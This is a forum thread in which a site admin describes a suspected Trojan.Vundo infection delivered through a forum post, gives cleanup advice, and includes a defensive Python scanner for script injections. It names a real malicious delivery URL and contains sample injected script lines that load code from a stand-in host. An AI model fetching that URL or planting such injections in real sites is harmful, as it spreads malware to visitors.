X Library Forums
I'm not sure what's going on. I think I got that trojan again (Trojan.Vundo.H), but this time I reacted immediately and I had already changed all my passwords.
One guess is that someone is hacking this forum and it causes you to get the trojan when viewing their post. I get a dialog box about opening a pdf file, I cancel it, then there's an svchost process running, taking 50% cpu time.
If this suspicion is true then it means some of you may have got it too. I am so very, very sorry. If this happens, you need to immediately pull your network cable, or turn your router off. Reboot in safe mode. Run something like MalwareBytes AntiMalware, then run HijackThis and do a complete, manual clean-up. Note that HijackThis is a very powerful and potentially dangerous tool. If you do not know how to use it then don't! Get someone to help you. There are forums where you can post a HijackThis log and they will help you. Needless to say, you need to be doing that on a computer other than the infected one. After this, to be safe, change ALL your passwords. If you have websites where you access your host via ftp or ssh then check all "index.*" and "*.js" files. Some JS may have been added to the end of those files which, I assume, spreads whatever this is.
These people are not hackers. "We" are hackers. These people are no different than paid thugs who break into your home. Their main goal is forced hosting and viral spread of advertising. Yes, advertising. They give honest advertising companies a very bad name. These scum are not doing this for fun - they are getting paid to do it - and I imagine the actual advertisers have no idea how their links are getting spread - they just purchase some "package" from a shady company who, it seems in this case, work with some companies in Russia who actually develop this stuff. I curse you, you sorry SOBs.
I deleted the suspect post as soon as I saw it. But, again, I sincerely apologize if any of you caught this. I think the only thing I can do is to take this forum down. I've been having to spend way too much time on maintenance, and now this. sigh
I now have the total number of registered users down to 196, whereas just a few days ago it was over 1500. I deleted any posts and users that were suspect in any way. I want to make this a forum you feel safe at - I promise you I am trying hard to do that. So far, nobody has reported that they caught anything from this forum... except me. So I'm beginning to wonder if I actually caught it from this forum or not. At any rate, I have disabled new user registration for now.
The code creates a script element and has it run some code from this URL: http://zylom-com.studiverzeichnis.com.topix-com.simpleworldhouse.ru:8080/wired.com/wired.com/google.com/tudou.com/asg.to/. It appears to deliver a PDF which itself runs a script (I'm just guessing about the PDF script) which modifies a registry entry to cause "siszyd32.exe" to be run on startup. You'll get a dialog box with something about updating a PDF (I can't remember the exact wording), and even if you cancel it, the deed is done. The properties for "siszyd32.exe" have this:
Description: Nero StartSmart 8 Inline Function DiscCopy Server
Original filename: InFDiscCopyServer.exe
Version: 188.8.131.52
Company: Nero AG
I have no idea what it copied from my hard drive and I'm thinking seriously about reformatting and reinstalling everything. This trojan is known as one of the following, I'm not really sure which: "Trojan.Vundo.H", "Troj/Agent-LVN" or "Rogue.SystemSecurity".
I'm posting this information in the hopes that it will help someone - as well as myself. I didn't think I could get something like this using Firefox, but I'm guessing the blame is more on Acrobat Reader than on Firefox. I'd like to know what configuration changes I need to make in Firefox and/or Acrobat Reader so that this can not happen again.
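The file check recommended earlier in this thread (look at every "index.*" and "*.js" file for script code appended to the end) and the mechanism described in the post above (a script element created at runtime that loads code from a remote host) can be automated. The scanner below is an added example written for this thread; it is not code from the forum post or from the site it describes. It assumes you have copied the site's files to a clean machine first, that your legitimate HTML pages end with a closing </html> tag, and that TRUSTED_HOSTS (a placeholder here) lists the hosts your own pages are allowed to load scripts from. The sample inputs at the bottom are constructed for the test and use the reserved name bad.example rather than the real URL from the post.

```python
"""Scan a copy of a web site for script injections appended by malware.

Added example for this thread, not the post author's code. Flags three things a
defender would want to see: <script src> pointing at a host we do not trust,
JavaScript that creates a script element and points it at a remote host, and
any content that sits after the closing </html> tag (where appended payloads
usually land).
"""
import fnmatch
import os
import re
import sys
from urllib.parse import urlparse

# Hosts your own pages are allowed to load scripts from. Placeholder: fill in
# your CDN / own domain; an empty set flags every external host.
TRUSTED_HOSTS = {"localhost"}

# <script ... src="http://host/..."> or protocol-relative src="//host/..."
SCRIPT_SRC_RE = re.compile(
    r'<script[^>]*\bsrc\s*=\s*["\']?((?:https?:)?//[^"\'\s>]+)', re.I)
# document.createElement('script') in JS (the loader pattern described above)
CREATE_ELEMENT_RE = re.compile(r'createElement\s*\(\s*["\']script["\']\s*\)', re.I)
# absolute URLs inside JS (http(s) only, so "//" comments are not mistaken for URLs)
REMOTE_URL_RE = re.compile(r'https?://[^"\'\s)]+', re.I)
# anything non-blank after the closing </html> tag
TRAILING_RE = re.compile(r'</html>\s*(\S.*?)\s*$', re.I | re.S)


def external_hosts(text, trusted):
    """Hostnames of absolute URLs in text that are not in the trusted set."""
    hosts = set()
    for url in REMOTE_URL_RE.findall(text):
        host = (urlparse(url).hostname or "").lower()
        if host and host not in trusted:
            hosts.add(host)
    return hosts


def scan_text(text, trusted=TRUSTED_HOSTS):
    """Return a list of human-readable findings for one file's content."""
    findings = []
    for url in SCRIPT_SRC_RE.findall(text):
        host = (urlparse(url).hostname or "").lower()
        if host not in trusted:
            findings.append(f"external script src: {host}")
    if CREATE_ELEMENT_RE.search(text):
        for host in sorted(external_hosts(text, trusted)):
            findings.append(f"createElement('script') with remote host: {host}")
    m = TRAILING_RE.search(text)
    if m:
        findings.append(f"content after </html>: {m.group(1)[:60]!r}")
    return findings


def should_scan(name):
    """Only index.* files and *.js files, as the thread recommends."""
    lower = name.lower()
    return fnmatch.fnmatch(lower, "index.*") or lower.endswith(".js")


def scan_tree(root, trusted=TRUSTED_HOSTS):
    """Walk a site copy and map each suspicious path to its findings."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not should_scan(name):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError as exc:
                results[path] = [f"unreadable: {exc}"]
                continue
            findings = scan_text(text, trusted)
            if findings:
                results[path] = findings
    return results


# Constructed samples (not real site content) used to exercise scan_text.
CLEAN_HTML = '<html><body><p>hi</p><script src="/js/app.js"></script></body></html>\n'
INJECTED_HTML = CLEAN_HTML + '<script src="http://bad.example:8080/w.js"></script>\n'
INJECTED_JS = ("function init(){}\n"
               "var s=document.createElement('script');"
               "s.src='http://bad.example:8080/a/';document.body.appendChild(s);\n")

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    hits = scan_tree(root)
    for path, findings in sorted(hits.items()):
        print(path)
        for finding in findings:
            print("   ", finding)
    sys.exit(1 if hits else 0)
```

Run it as `python scan_site.py /path/to/site-copy`; a non-zero exit code means something was flagged, which makes it easy to wire into a nightly job over a fresh download of the site. The "content after </html>" check is the cheapest and most reliable of the three, because appended payloads rarely bother to move the closing tag; the host allow-list is what keeps a legitimate CDN reference from showing up as a hit.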
Here are some application settings I changed, in the hope of preventing this from happening again:
In Firefox, go to "Tools / Options / Applications" and for all Adobe Acrobat types set their action to "Always ask".
I have no idea if making these changes will prevent the trojan from being installed. The only way to be sure is to set up a page which contains the malicious code and give it a try... but I'm too chicken to try it.